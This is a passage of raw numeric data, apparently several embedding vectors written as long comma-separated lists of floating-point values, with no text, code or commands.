0.018504072,0.0018438653,0.017590554,-0.008880531,-0.013698373,-0.017709615,-0.005330306,-0.01600373,0.006986086,0.010326677,-0.03129467,-0.0066772033,0.0073457304,-0.021017201,0.004353028,-0.015574704,-0.014126452,0.0090762675,0.0196491,0.0041835145,0.006683632,-0.02065895,-0.0017304184,0.01943082,-0.0009367854,-0.007181601,0.010609934,0.009047193,0.007328909,-0.006634962,-0.0005063541,-0.058273327,-0.0032627727,-0.019257577,-0.004467462,0.008511795,-0.026287507,0.0013409699,0.027198225,0.019233564,-0.012087579,0.02509687,0.020018656,-0.016999716,-0.00046264764,0.0044132094,0.026610363,0.0029868053,-0.014678496,-0.0038819592,-0.009555427,-0.0032505102,0.011269979,-0.017154394,0.027785825,-0.011169648,-0.0021555417,0.0015348145,0.0011194316,-0.005842214,0.009580427,0.011444884,-0.03217837,-0.00026397873,0.0027291924,-0.0026845303,-0.008680008,0.004962669,0.01338539,0.07289893,-0.055986393,-0.010117265,0.0066839615,0.007374442,-0.031585436,0.012728577,-0.0011220009,-0.014152519,-0.030798517,0.013809078,-0.0018663533,0.0012465486,-0.030891147,-0.0031022616,-0.0074086892,-0.000085129446,0.0072709634,0.028966846,-0.00404772,-0.023934979,0.03285861,0.0045994474,0.0021829444,-0.0042516133,-0.0007785832,-0.02745682,-0.011868551,-0.0024643636,-0.0028109609,0.005742199,0.0060460614,0.012960319,-0.004353578,-0.0022521045,-0.004901328,0.004217219,0.016426938,-0.0034247355,-0.022267424,-0.0154772,-0.012463656,-0.0013315172,-0.00024348593,0.01596969,-0.0026292491,0.0005102659,-0.0017047039,0.007691184,0.1552793,-0.027924124,-0.015169706,-0.00043529065,0.0046009207,-0.0029795398,0.023015702,0.02139422,0.0047586346,0.031789724,-0.0016606638,-0.009013308,-0.010830681,0.007153265,-0.0042490894,-0.027273225,0.0017312535,0.13603912,-0.00881452,0.002963631,0.0075832084,0.0022825252,0.020416474,0.0076540746,0.020439258,-0.09960639,0.0034821962,-0.02243325,0.0024017857,-0.0017211502,-0.05832469,0.037590835,-0.0052254205,0.002758401,0.016214052,0.025230534,0.009264952,0.0049797725,-0.025265886,-0.014920404,-0.010844796,-0.008240773,0.006694578,0.003557192,-0.00032442002,0.034360077,-0.041232437,-0.019627327,-0.011247653,0.017074462,0.024377536,-0.009263712,-0.007029223,0.008235367,-0.010813522,0.017106352,0.006616183,0.0013107668,-0.045299713,0.0064203027,-0.022582851,0.009427868,-0.002187193,0.033492763,-0.03541112,-0.019543346,-0.028988846,-0.010628871,0.014716978,0.0080603855,0.0067931595,-0.0033820525,-0.02537455,-0.017242434,0.024742706,0.013366143,-0.011916456,0.013746267,0.014179305,0.0017141498,0.022020089,0.0000283928,-0.011766209,-0.0024247977,-0.007613081,0.027688853,0.0030346622,0.006426149,0.01874817,0.0084849745,-0.012442311,0.008711675,-0.0024896187,-0.0030295039,0.018058088,0.005869529,-0.0029223713,-0.0052989684,0.009800339,-0.013647413,-0.007886408,0.029140856,-0.021375895,-0.01174607,0.015024879,0.011217723,-0.017516043,-0.02835627,-0.008896368,0.005406313,0.016998248,-0.006624369,-0.0007469639,0.0054770433,0.00091811747,-0.0071742125,-0.0025260965,-0.018892815,-0.035887036,0.0137252975,-0.0020964288,-0.009529929,0.0033606282,-0.003913049,-0.030046746,0.0012720184,0.009049721,0.0069434876,-0.032885537,0.009480755,-0.0120735755,-0.015978277,0.00342628,0.054277413,-0.00066810654,-0.011603929,0.0011317497,-0.041328344,-0.016352646,0.0012101724,0.0153315,0.0040935506,0.014046477,0.003952084,-0.00053176313,-0.000011820237,0.017899526,-0.0005721576],[0.0042189895,0.0022099619,-0.022246033,-0.021971297,0.018300036,-0.012403675,0.0032538173,0.023151012,-0.000376245,-0.015388179,-0.007958735,0.008621315,0.0021883335,0.002036625,0.009849579,0.005959648,-0.0022526453,0.0028806706,-0.00016289401,-0.017726487,0.0038527397,0.0009218174,0.008206945,0.00009279093,0.007624148,-0.0021624644,-0.0039350465,-0.006501856,0.008031236,0.006708611,0.005070239,0.02373608,-0.009638599,0.008500626,0.015700042,0.0005539524,-0.02709158,-0.008063631,0.018844845,-0.015751744,-0.023142386,0.0120309265,0.0024295128,0.0510124,0.014683292,-0.009171936,-0.017455839,0.0020923198,-0.015079067,0.01390073,0.013570618,0.009555303,-0.04231655,0.010557034,0.008231504,0.006545857,-0.0019668858,-0.039493594,0.023885693,-0.012364964,-0.0022728252,0.0065753036,0.0214016,-0.03586257,0.019545045,-0.0030836996,-0.0048816144,-0.024368659,0.020233516,-0.021978661,0.010036517,-0.0033171212,0.011646786,0.002554389,0.021602884,0.008331617,0.004300616,-0.0057640867,-0.0050032516,0.011637603,-0.02542625,-0.019087385,-0.0117852,-0.018126177,0.012290548,0.016599862,0.011519755,0.01151807,0.0021857962,-0.007401908,-0.0006619627,-0.009542479,0.021219334,-0.0027367668,-0.0064704637,0.011490823,-0.000047268026,-0.0011357133,0.00044917755,0.010726076,-0.00013629162,-0.015033683,-0.018784441,0.0160385,0.0015642982,-0.015966557,-0.0188177,-0.009621491,-0.0039070547,-0.0032059683,0.0024323936,0.013226055,0.003681543,0.02581175,-0.01621214,0.008765698,-0.007179544,0.008749146,-0.0022491391,-0.00024426868,0.0027618047,0.027452406,0.008097974,-0.0009489617,-0.021727804,0.015408015,0.0019246547,0.0097713135,-0.003435631,0.007848554,-0.0027456959,0.0015216827,-0.014966308,-0.010468569,0.0021589193,0.007963043,0.011375515,0.004403009,-0.009823021,0.0005626446,0.018773133,-0.013530815,0.007720531,0.013918222,0.015164666,0.012599793,0.0009180675,-0.005347237,0.01998614,-0.019540131,0.015205262,0.0017701999,0.015572083,-0.00041041247,0.008222604,0.020913908,-0.0043452703,-0.024576785,0.004237857,-0.0032218439,-0.00015701923,-0.014232125,-0.0021036689,-0.004527033,0.003502977,-0.022805672,0.017280363,-0.012215687,-0.039269287,-0.010164059,0.019312458,0.03189484,0.017449517,0.011710642,-0.0048383037,0.02081546,-0.010874924,-0.0075926343,0.0065874048,-0.0077349255,0.023607468,0.003367437,-0.016767832,-0.010067592,-0.008510964,0.01968873,0.021702807,0.027327944,-0.004492165,-0.01316669,0.005744215,-0.0117207365,0.0056199376,0.0057320315,-0.02383965,-0.02501898,0.00031092865,0.0716545,-0.014959565,0.015338337,0.0020993955,-0.012728425,0.008405946,-0.04015477,-0.019172981,0.013471251,-0.0014425395,-0.0036245317,0.016051667,0.0060590524,0.007890532,-0.0090027945,-0.012005441,0.0058685625,-0.01584565,-0.0516885,0.028057717,-0.0010097709,0.010169249,0.00684153,-0.02140155,-0.0010879732,-0.0055340966,-0.02901319,-0.0051385337,-0.020604942,-0.021008981,0.002583561,-0.0020421797,-0.0060388795,0.003966404,0.008129572,-0.0073823505,-0.009726704,0.022890046,-0.016649555,0.0064767436,-0.015906407,-0.014120918,0.0031014574,-0.006384479,0.007398166,0.011774111,0.026526835,-0.013073128,-0.0030655966,0.0028794883,0.01236636,-0.015450353,0.026604654,-0.0011302597,-0.0061925366,0.0077686505,0.02000764,-0.006934743,-0.027437743,0.027598286,-0.008760743,-0.0020388593,0.004484091,0.03806463,0.030782402,-0.021252131,0.0013637608,0.026756631,-0.011735401,-0.0028692705,-0.03552769,-0.005548984,-0.018483391,-0.012968421,0.022397596,0.027832694,-0.002275412,0.0055906232,-0.0152111035,0.0052329507,-0.0018823835,0.00013543677,-0.0055260416,0.004009571,-0.0037573678,0.004765214,-0.0029089532,-0.016814295,0.023333302,0.0042940476,0.0076941326,0.026775686,-0.0059787855,0.007213616,-0.009568104,0.025991049,0.0053795436,-0.028692178,-0.0030866328,-0.02264419,0.018598275,0.02254158,-0.020267721,-0.003020065,-0.019742928,0.013870656,-0.021944704,-0.0030863027,-0.011180773,-0.00893218,0.033898093,-0.03263058,0.020158581,-0.038160935,-0.01531907,-0.0154061755,0.009422786,0.011703727,0.0061351685,-0.017191436,-0.00032794187,-0.016612258,-0.006217849,0.009232029,-0.026183974,0.02529757,-0.019692505,-0.0032547864,0.0005944721,-0.008886604,-0.015858594,0.014361943,0.016142739,-0.015534405,0.0072465222,0.01953681,0.02351717,-0.021072192,0.015368743,-0.014121102,0.022184614,-0.0039385157,-0.009246824,-0.004851795,-0.009839806,-0.008262042,-0.005758855,0.0018928872,-0.008971207,0.009372545,0.016369063,0.007523594,-0.0035956716,0.031440612,-0.02441158,-0.01584852,-0.0051553478,-0.020397007,0.0017441958,-0.010167072,-0.0036521081,-0.00018533268,0.0005527795,0.017192718,-0.006270079,-0.002675779,0.006064211,0.088176474,0.01060887,-0.0049580904,-0.0011096088,0.009267936,-0.008446172,0.024817046,0.00038284704,0.005552892,-0.011901639,-0.00776501,-0.0018060156,-0.00005446303,0.03183655,-0.009041931,0.011682242,-0.024998233,-0.01782703,-0.028418014,-0.026242042,0.013314914,0.004773482,-0.0020797248,0.010804347,0.018613348,0.017620794,0.022553388,-0.0033525662,0.005487107,-0.017679112,-0.001429104,0.031485125,0.020629503,0.004155245,-0.027422197,0.023086706,0.028947266,0.0070546125,-0.03533934,-0.011187869,0.0030969952,0.0096963,-0.010714545,-0.02127952,0.0024631387,0.04902693,-0.017610723,-0.012925121,-0.012763909,0.028223656,0.012181731,0.011703071,-0.020442365,0.003914663,0.010340196,0.01450241,0.007050074,-0.037520748,0.042080604,0.027428068,0.016185317,0.027606824,-0.002740473,-0.00119239,-0.0067736283,0.020782247,-0.004992331,-0.00807066,0.0120147355,0.004081701,0.0038379517,0.026484296,-0.0060816715,0.0050138044,0.0020301512,0.02513866,-0.019024776,-0.0077057765,0.016833862,0.053704437,-0.019672446,0.0033139316,0.004642052,0.010634058,0.008842881,0.0027807928,-0.01525008,-0.001806558,0.007711221,-0.027293429,-0.004965248,0.0030159934,0.0032927617,0.0036798113,0.015332329,0.011054962,0.011457386,0.022562416,0.011433265,-0.006120766,0.0033866344,0.0061858995,0.0029986266,-0.013047206,0.0028951473,0.007499862,0.0007993137,-0.00023473668,0.005990325,0.037134223,-0.026715862,0.017497893,-0.0003756693,-0.020973073,0.000024273633,-0.022531377,0.0031063964,-0.03159024,-0.0045589884,0.0038753902,0.022659404,-0.0036926346,0.0067783953,-0.012330558,0.0011189338,-0.018120285,0.008633444,-0.02954243,0.011576925,0.02533649,0.003741344,-0.0020260364,-0.0039362977,-0.05389983,0.02968718,0.0028782065,-0.019596172,-0.026136886,0.04295573,0.024975933,0.012447279,0.025599228,0.024674539,0.008954581,-0.0011732954,0.03666602,0.034710143,-0.007891435,-0.03333435,-0.0098470375,-0.010263927,-0.0001939624,0.015520528,-0.030210942,-0.009873456,0.0146383755,0.03532785,-0.0029607394,-0.012102732,-0.006549937,0.023570089,-0.04060454,-0.0024947498,0.007300799,-0.004354708,0.032035958,-0.012597308,0.05408982,-0.0069563366,-0.016583666,-0.015214502,0.016619973,0.015195086,0.010337236,0.00048419638,-0.018404499,-0.0071968623,-0.016570024,0.020119628,-0.013794489,0.024323756,-0.01302894,-0.011643384,0.006726099,-0.00025171938,-0.007712136,-0.005591037,-0.011926996,-0.021511411,-0.01116282,-0.023215033,-0.027544618,0.03922933,0.016721703,0.0012078253,-0.023655932,-0.011009267,-0.008289997,0.006344413,0.017171992,0.0017327323,-0.0037969616,-0.0063795964,0.010089451,-0.0029764234,0.0050254078,0.037988096,-0.0076239146,0.011624386,0.005898354,0.018508451,0.020651883,0.008826122,0.021022966,0.020631228,0.022137942,-0.017599905,-0.00021180882,0.021859175,0.016859885,0.006969953,-0.010803273,-0.00033589415,-0.027844617,0.0060254475,-0.020749459,0.014192759,0.009893613,0.0024595861,-0.023073936,-0.011399775,-0.01575265,-0.019768223,0.004684382,0.0071774684,-0.005956056,-0.016714936,0.0015133709,0.005508296,0.016384598,-0.020080697,0.0041903006,0.016081117,0.00038965486,0.021076042,0.009025574,-0.01976702,0.003377239,0.009942172,-0.015484471,0.00506124,0.0031125548,0.02027045,-0.019806398,-0.0058649825,0.007831782,0.0030709773,-0.006308681,-0.022605166,0.017440893,0.017827276,0.013992847,-0.008223785,0.02453367,-0.026629386,-0.013288703,0.018797457,-0.025348252,0.009063529,-0.008931768,0.01339453,-0.004733023,0.0047437553,-0.004340972,-0.015513145,-0.0033608465,-0.011203164,0.03732779,-0.044038024,0.0077230437,0.0037196628,-0.0064976383,-0.0033417467,0.022538826,-0.0029539696,0.0075565814,0.003310978,-0.015160132,0.004745718,0.008583706,-0.012224686,-0.002593345,0.02578998,0.00016412263,-0.025509521,-0.017648207,-0.017550329,-0.0481635,-0.009392104,0.032529343,0.013360973,0.020046689,0.0023149082,0.0059214425,0.0035843228,-0.02792983,-0.0029531503,-0.04653164,0.005026186,0.012552588,-0.03970359,0.022753432,-0.014065377,-0.012267657,-0.0019718388,-0.028872928,0.013763764,0.00093641435,0.0075347107,-0.015629956,-0.00969536,0.009595711,-0.019360026,0.024001539,-0.00891599,0.009965023,0.009488236,0.015252605,0.009033169,0.011856268,-0.006552832,-0.0012890843,-0.019772213,0.018040052,0.0064985314,0.03172544,0.0045059877,0.010335249,0.004576216,0.0031796843,-0.006209552,-0.010591817,0.00052852347,0.03747848,-0.0025831982,0.00367388,0.0057589523,-0.008675383,0.026731934,0.009815173,-0.024113039,-0.019745668,0.006796958,0.029534467,0.0014207186,0.025255382,0.0044800467,0.022106363,-0.0119756255,-0.011663095,-0.019095106,0.02651877,0.013246026,0.0017333713,0.0066938354,0.0077558816,-0.0040527456,-0.019942,-0.009978379,-0.013057003,-0.0068704463,-0.027104404,0.014958797,-0.025562724,0.0034095524,-0.044142332,0.007731521,0.013944077,0.020681638,0.013662875,-0.018032469,0.007342536,-0.008729733,-0.01424989,-0.019989213,-0.046080206,0.0032280076,0.039689455,-0.03831058,0.0119328685,0.010956826,-0.0041813473,0.00548001,0.0042254846,-0.01125812,-0.032290015,0.008692508,-0.012346061,0.02589976,0.005041381,0.026632803,0.009456275,0.0012251023,0.010148207,-0.010397756,-0.0074520987,0.005795407,-0.0033886817,0.016828695,-0.0037297509,0.0070772097,-0.020643415,0.00004837218,0.0015153576,0.013952058,-0.03906383,-0.0064099454,-0.008501459,0.008035787,-0.0065433118,0.015427474,-0.012505053,0.060037985,0.018328859,-0.035021637,0.009089422,0.008029731,-0.0016646815,0.029355273,0.043073907,-0.005537193,-0.03588396,0.0014110677,0.02514969,-0.02174486,0.033254534,-0.008412339,-0.020308467,-0.028730841,-0.036288537,0.0035029845,-0.013789518,0.008666922,0.010767381,-0.025582494,0.041123416,-0.011022968,0.014021455,0.013894371,0.013239765,-0.0040404354,-0.011051512,-0.008373719,-0.042807974,0.0051992633,-0.004850691,-0.014283509,-0.016733643,0.012971024,-0.034700003,-0.013633943,-0.03138391,-0.0076864283,-0.0040736888,0.01945862,0.012603685,-0.001354246,-0.012792307,0.025704892,0.006409624,0.02063391,-0.013058671,-0.009083114,0.0153544145,0.013135187,0.025568802,0.0011334268,-0.009780975,0.022411926,0.00244295,-0.023427846,0.025061153,-0.0007259309,0.011147089,-0.0010637078,0.012413281,-0.0098743625,-0.012764516,0.026119914,-0.02006463,0.024260275,0.030723667,-0.0052195024,-0.008772285,-0.0052466965,-0.024545593,-0.017113402,-0.01424625,0.018402372,-0.01972507,0.010046144,0.007899318,-0.031180246,0.010936778,-0.007009672,0.019742023,-0.0057054604,0.016587656,0.019832183,-0.00053053844,-0.037259895,-0.011131117,0.004016801,-0.005338017,0.009909172,0.007796322,-0.0016615336,0.019802649,0.028108507,-0.0036639206,0.0019831578,0.0058840234,-0.0076223765,0.030391958,-0.0014523715,0.016530002,0.0062366826,0.0016811024,0.02676535,-0.03283095,-0.014926277,-0.014540761,-0.015761016,-0.0067476444,-0.0426981,0.007576465,-0.016295051,-0.004276156,0.035120737,-0.017368425,-0.0010148527,-0.008367517,0.0010685335,-0.008193761,0.0014224469,0.019851742,-0.003224159,-0.02132167,-0.025721231,0.012398597,-0.0033994731,0.01865623,-0.012844908,0.0038550547,-0.0062025334,-0.0045704567,-0.0040222537,0.0018149402,-0.013483924,0.006549625,0.04804225,0.019264815,0.007457264,-0.021858957,-0.0148362955,0.008913385,-0.009348877,0.002465421,0.005120317,0.013819865,0.016750105,-0.008369548,-0.030385355,-0.015175335,-0.039506778,0.03532899,-0.018768946,-0.005561918,0.0033037842,-0.0046189884,-0.008897018,-0.0035350278,0.014200191,-0.0146527095,0.011170895,0.0047716056,0.011390929,0.01201494,0.016491437,0.002549102,-0.004007777,0.015999809,0.01827785,0.005606972,0.0030040652,-0.0053747687,0.009481986,-0.016168738,0.028633807,0.031746317,-0.009979786,-0.010063052,-0.028785331,0.010554445,0.0020623694,0.0052416367,0.018308368,-0.009060861,-0.005235803,-0.026636286,0.011672985,0.017310865,-0.031611595,0.013890512,-0.011685251,-0.00007246728,-0.015725525,0.030146126,-0.019805312,-0.041061446,0.0043461467,-0.008370275,-0.0025670312,-0.027103499,0.04377284,0.0032544124,-0.011620158,-0.008414347,0.012770205,0.011382788,-0.007840755,0.022373958,0.028318046,0.012043902,0.0011734981,-0.02107357,-0.009474356,0.019181542,-0.034517694,0.0020849642,-0.017697716,0.028159581,0.0030119068,-0.0061466056,0.00621512,-0.006701586,-0.017642012,0.008443331,-0.043589544,0.019401155,-0.030109033,-0.007867256,-0.008330925,-0.03840098,-0.009516042,-0.0066238125,-0.016990244,-0.0035993848,-0.027106635,-0.0086880345,-0.0021837186,-0.008194836,0.009578774,-0.011480869,-0.015821299,-0.00012393708,0.0037600566,-0.0013700066,0.016543718,0.008132993,0.011817552,-0.007865952,-0.010203468,0.00083210535,0.019672133,-0.0027583616,-0.012403295,0.035182573,0.005657379,0.0007476186,-0.00518211,0.028493958,0.006578036,0.036915563,0.003641014,0.032108117,-0.0148889795,-0.008148357,0.03463692,0.01914662,-0.0017924985,0.0035919023,0.019319337,0.022285493,0.008411687,-0.012379247,0.023915095,0.01554556,0.007216862,0.025382042,0.022953216,0.008604437,-0.019351281,0.0051137786,-0.0039216997,0.030569382,0.021742232,-0.013561839,0.006475498,0.01891231,-0.0011282483,-0.018949475,-0.01892229,-0.0050888727,-0.014101833,-0.0145628,-0.02032139,-0.00464214,0.014013659,-0.011468845,0.021027718,0.014358687,0.0022551913,-0.0074470676,-0.003799559,-0.015702741,0.013437199,0.0078084376,-0.0034815264,-0.002148641,-0.011351169,-0.011787715,0.03570475,0.006762549,-0.010558813,-0.022261072,-0.010247268,0.010979071,-0.022132851,-0.0096319225,-0.0032084545,0.0013439357,-0.010440307,-0.011879285,-0.0045551565,0.02871913,-0.025276441,0.021164212,-0.009491703,-0.006765,0.022054626,0.016909802,-0.0040962882,0.0051170136,0.013844762,0.025635911,0.0057505094,-0.005502195,-0.0039069536,-0.010724211,-0.012986798,0.0017359868,-0.023603352,-0.018150792,0.0006227621,-0.013647119,0.0032229135,-0.007238339,-0.02987953,0.03222757,-0.014217169,0.031396307,-0.0011607994,-0.004971035,0.0023877302,0.012846094,-0.0015699514,0.015496941,-0.017598772,0.00014249189,0.0014286353,-0.034523077,-0.0034542806,-0.0071918014,0.0040199985,-0.008755495,-0.0095048845,-0.0370828,-0.0059065246,0.006317852,-0.029716874,-0.011012136,0.015257365,-0.019421987,0.0019660473,0.007430675,0.0077863378,0.0045297868,-0.0030156036,-0.021261858,0.044680674,-0.0005878882,0.0029692934,-0.0037612906,0.021086244,-0.0041672904,0.032629866,0.014137725,-0.021215873,0.02497714,0.008980063,0.012340486,-0.00017014811,-0.010618515,0.004248557,0.009794726,0.020958208,-0.0004906783,-0.012249101,0.017335238,-0.008743865,0.0021566628,0.02009776,0.02115881,-0.0015163037,-0.0018341116,0.0040014386,-0.0043600285,-0.030387297,-0.0026256875,0.0002539141,-0.017190965,0.00012785214,-0.020099783,-0.013972288,-0.006936065,-0.013233004,-0.006848327,-0.0031976458,0.0044653486,-0.005527042,0.024000587,0.0048775016,0.021638341,0.006668992,-0.0013086287,-0.012558979,0.019962385,-0.015742343,0.000073761425,-0.025330774,-0.0048095463,0.017833661,0.02606711,0.027922533,0.0124286385,0.0036379562,-0.053230193,0.025708716,0.022073511,-0.010427159,-0.009880632,0.017489389,-0.00022401391,-0.015999496,-0.0070158006,0.006254471,0.031108355,0.0067552165,-0.00039632057,-0.012075555,-0.01234132,-0.0007763369,-0.019652426,0.055677712,0.017121777,0.013910295,-0.0064916746,0.016785067,-0.009479343,0.017653625,-0.01372186,0.024896607,-0.019407831,-0.041221146,-0.023956167,-0.012525504,-0.019193351,0.0057964055,-0.0074140998,0.0047446606,0.0022171964,-0.0014724861,0.033574164,0.0027719266,-0.0145375,-0.011494159,-0.0043121413,-0.00008806328,0.0017280435,0.01949167,-0.013114184,0.024113528,-0.008228415,-0.0035438584,-0.0156492,0.037048638,0.0008208262,-0.0005635791,0.008504037,-0.005272379,-0.017484074,-0.0072136233,0.0042130435,-0.003369707,-0.023769513,0.049010877,-0.020373808,-0.010032282,-0.0070748436,-0.01645369,0.0068863817,0.005777748,-0.01584087,0.009793039,0.0020481078,-0.014164566,-0.008850163,-0.006991677,0.010628474,0.006963659,0.017298613,0.023723988,-0.01654647,0.014311304,-0.014560097,-0.0019336162,0.009466026,-0.00012945202,-0.017861445,0.009629441,-0.02371333,0.012815571,-0.028460687,0.003317197,0.0008136148,-0.00048660202,0.0072078365,0.018261995,0.012772503,0.011366129,0.009738869,-0.00050977943,-0.008725886,-0.012517402,-0.0065252176,0.023297727,0.009049456,-0.016554557,0.018238345,-0.00873015,-0.01051754,0.060212195,0.007456369,-0.006929859,-0.013166674,0.0134039195,0.01964384,0.02745789,0.018218325,-0.002615709,0.005387379,-0.01821784,0.017993152,-0.010823909,0.0056447187,0.0112116225,-0.0071518854,0.02535164,-0.0018082533,-0.003009985,-0.014716931,0.009373894,0.01668739,0.014673535,0.0067238784,-0.018656759,0.004897552,0.0051681777,0.010572828,0.017879033,-0.002207234,-0.005118737,0.0051378524,0.008522514,0.021979034,-0.01634833,-0.05973881,0.0124498615,0.1529897,0.001259856,-0.0106780175,0.053261984,0.0015525371,0.0018399734,-0.104045264,0.0020506852,-0.0037559932,-0.0074235075,-0.0056613935,-0.0023572957,-0.010726935,0.0014842987,0.0014939939,0.0026973293,-0.020693803,-0.012864816,0.017558739,-0.015142883,-0.004474358,0.008292472,-0.019408597,-0.0072898185,-0.0431391,-0.017008621,-0.0054491707,0.008123108,-0.0053917523,-0.022241645,-0.016860707,-0.009294461,0.015905658,0.013372994,-0.019476337,0.012855904,0.0050766463,0.01240964,-0.0017694007,0.017036015,0.012791839,0.00756277,-0.009608059,-0.038549725,-0.1409677,-0.0042401915,0.0064884787,-0.02919205,0.024824582,-0.016014019,-0.006345294,0.007687617,0.01737413,-0.006058263,0.015462612,0.021997543,0.004157125,0.014975145,-0.009057892,-0.011048942,0.010505467,0.0038503471,-0.007476755,-0.009919302,0.014123973,0.0049716877,-0.005744364,-0.04553173,-0.029725028,0.0051266733,-0.003432546,0.032691933,-0.031366415,0.003792978,-0.022583358,0.014243731,-0.02757112,-0.00027837305,0.002952208,-0.027834944,-0.008354344,0.003871786,-0.007981532,0.020719852,0.0028758007,-0.006791528,0.021271165,-0.000664547,-0.002929183,0.016041294,0.0044797123,0.0234002,0.040534895,-0.006868514,0.0026611183,0.011131245,-0.013630602,0.021112494,-0.0064262734,0.009647733,-0.012699487,-0.002298961,-0.015014399,-0.0044136737,-0.018450633,-0.024800314,-0.0116426665,0.004101032,0.035578683,-0.006089716,0.035175037,-0.02391987,-0.0051823263,0.00085104344,0.0060283896,-0.0041243737,0.010549899,-0.011345932,0.0005186947,0.009464612,-0.015430791,-0.00890776,0.029954115,-0.002343003,0.004154023,-0.0030878522,-0.005519245,-0.02064605,0.02577333,-0.021973668,-0.00065123534,0.0130640585,-0.020445688,-0.020692145,0.021104572,-0.018832106,0.013935283,0.0005877338,0.007583378,0.0019804267,0.04026482,-0.028094957,-0.04051019,0.017106492,0.0014488522,-0.009886073,-0.017532183,0.007447228,-0.0013963747,-0.0153034255,-0.00832519,-0.022168402,-0.020942004,-0.008938713,-0.023795713,-0.0074885334,0.022604788,-0.0069417134,-0.015353467,-0.01906715,0.017675314,0.012978069,0.0001033589,-0.0038476062,-0.03795846,0.010288548,0.002193433,0.03056947,0.041426525,0.009222688,-0.011245022,-0.007488344,-0.01200621,0.0075810924,-0.028194398,0.008804655,-0.018151304,0.022379672,-0.019461874,0.01009576,-0.036171723,0.00007826722,-0.031107655,-0.007571876,0.0086756395,0.0015673756,0.0068590064,-0.011464945,0.011082343,-0.014234052,0.041423697,-0.010287105,0.010764975,0.005736037,0.0026521678,0.017965456,-0.032547418,-0.02049615,0.015170344,0.06623948,-0.005599481,-0.026963895,0.008995205,-0.0021557831,0.005927689,0.020704594,-0.014678728,0.0059993537,-0.00039711458,-0.041396804,-0.010297775,-0.0015854756,0.0037740339,-0.025700737,0.02006564,0.007481381,0.026150996,0.0011340637,-0.0016781975,0.023326809,-0.00591135,-0.010544121,0.017100146,0.0066691968,0.014470635,-0.0015456475,0.012299819,0.0035495756,-0.014767642,-0.0048326333,-0.0206175,0.004353947,-0.004095992,0.021632714,-0.03118464,-0.00048205807,0.0111592375,0.0060292883,-0.005814014,0.0025594565,0.019796181,0.004397677,-0.028184554,-0.014768471,-0.0053726346,-0.009944855,-0.0021590446,0.014986406,-0.00032324807,0.0121848835,0.023558458,0.0045156362,-0.0011551892,-0.0026568146,0.0067194374,0.014533348,0.00043269043,0.0051285755,-0.00820721,0.02931295,-0.023109687,-0.016830893,0.0002403596,-0.014374033,-0.0007894947,-0.0039824843,-0.008457528,0.023156956,0.014198496,-0.015825633,0.005758749,-0.009052138,0.00052564964,-0.0054276884,0.005834649,-0.02233472,0.00026887978,-0.0067736576,0.019139702,0.0033342484,0.021194497,0.00031461762,0.0022237576,-0.017556498,-0.05344176,-0.0050040465,0.019421745,-0.009927674,-0.0024271973,0.0052364483,0.0006466891,0.027823621,0.0024154629,0.025953947,-0.0020866836,0.006050113,0.0064089415,0.029745394,0.0027681072,0.0203828,-0.00404854,0.005926585,-0.035132926,0.014994548,-0.012873671,0.018683435,0.0013925111,0.010461112,-0.00040083277,-0.0018968362,-0.012335602,0.01711622,-0.02697266,-0.023975573,0.029203393,-0.0034375477,-0.0042655556,0.021155903,0.0028880772,0.003422079,0.008305376,0.006635833,0.010842035,0.01973931,-0.010784493,0.0072896793,0.008031936,-0.027097601,0.021003496,-0.0037541217,0.00808284,-0.005057253,-0.007743119,-0.021217978,0.0011698036,-0.0025647734,0.017038187,0.007660125,0.013948513,-0.013512745,-0.010780651,-0.0014218059,0.010360754,-0.0025432487,0.016275989,-0.012222784,0.00940279,-0.022175018,0.00644733,-0.027886987,-0.0012324357,0.010155889,0.0026155803,-0.00015180062,0.011056349,-0.024826698,-0.007141881,-0.014083259,-0.0042260624,0.0054436466,0.017276641,0.021424005,-0.005228502,-0.0071709235,0.026186373,0.014524676,-0.009069741,0.031410556,0.0009201876,0.008901848,-0.021335354,-0.005822555,0.0006936999,-0.0016904103,-0.012623221,0.016767228,0.019588152,0.010727762,-0.007250487,0.015944917,0.019593447,0.004889974,-0.024413446,-0.016425163,0.0064962315,-0.010440311,0.022310695,-0.008475048,-0.030086672,-0.017223464,-0.005009154,-0.009754155,-0.0035827623,-0.01136104,-0.0058907755,0.0033864602,-0.0060396674,0.005912385,0.019572947,-0.003931616,0.027991617,-0.0063888496,-0.024155464,-0.010938198,0.0011970123,0.008279188,-0.002369348,-0.0013004611,0.0048807976,0.004000601,0.011945179,-0.01079217,0.004098138,-0.0020500757,-0.013084423,-0.00034709557,0.02005982,0.007559591,-0.024670158,0.0154072875,0.00761545,-0.0074639604,-0.0017143276,-0.0054172245,-0.023301745,-0.017857026,0.04640598,-0.014647943,-0.014109098,0.007912604,0.009648721,0.01749416,-0.011719121,0.0012031945,-0.015793035,-0.010627341,-0.007507911,-0.03665369,0.002304091,0.014226589,-0.01910152,-0.02159703,-0.010943375,-0.018241154,-0.0114659555,-0.006823674,0.011545622,-0.0035050116,0.0170831,0.0013695789,-0.0044889357,-0.053746738,0.007729934,0.0031433343,-0.02419575,-0.015207327,0.0075130695,-0.015250733,-0.021460295,-0.009275657,-0.017972039,-0.014018925,-0.0016466978,0.029061228,0.02124018,-0.0051927115,0.024333378,0.0007588674,0.02571928,0.003917529,0.0076959543,-0.0042063957,0.010700133,0.0065561626,-0.0114415,-0.004183534,0.0045571425,-0.0058359536,0.037123125,0.0024935834,-0.022300715,0.02781036,0.007861015,-0.0019250155,-0.0068746107,0.005786078,0.027309678,0.0024324493,-0.015679432,-0.005521277,0.017476408,0.0019295786,-0.0027512086,0.0016983032,0.01106373,0.005481885,-0.020800807,0.012759014,0.010671366,0.01407676,-0.0060062497,-0.0131262075,0.020897971,0.011020794,0.017657926,0.016800966,-0.020345632,0.013548659,-0.0048762965,-0.017516633,-0.0004011775,0.022450488,0.0192298,0.020580273,0.013265012,0.0032387208,0.02792707,-0.0015175509,0.007967154,-0.0032839116,-0.0067438926,0.013987568,0.007795275,-0.0035754605,0.017180404,-0.032515462,-0.010383281,0.00881668,-0.016981354,-0.0018163502,-0.023448939,0.021833485,-0.08645754,0.012558365,-0.020777829,-0.015711205,-0.015985232,-0.008648979,-0.0026554777,0.0284258,0.010242618,-0.034595758,-0.018864334,0.008381901,-0.0026994015,0.0036733253,0.010143262,0.00925533,-0.009312346,0.010490249,0.004188079,0.016620228,0.010218147,-0.0139404135,0.00900416,0.0007541483,0.018444482,0.0086735,0.0008351556,0.009023537,0.019624602,0.007412547,-0.004195746,0.018926203,0.009720812,0.015583466,-0.0027778312,-0.0029698524,0.0033153382,-0.0014965096,0.010052528,0.02333353,-0.0044048657,-0.013709514,-0.0070125298,0.007364347,0.031268053,0.001237572,0.017876854,0.026907839,0.028794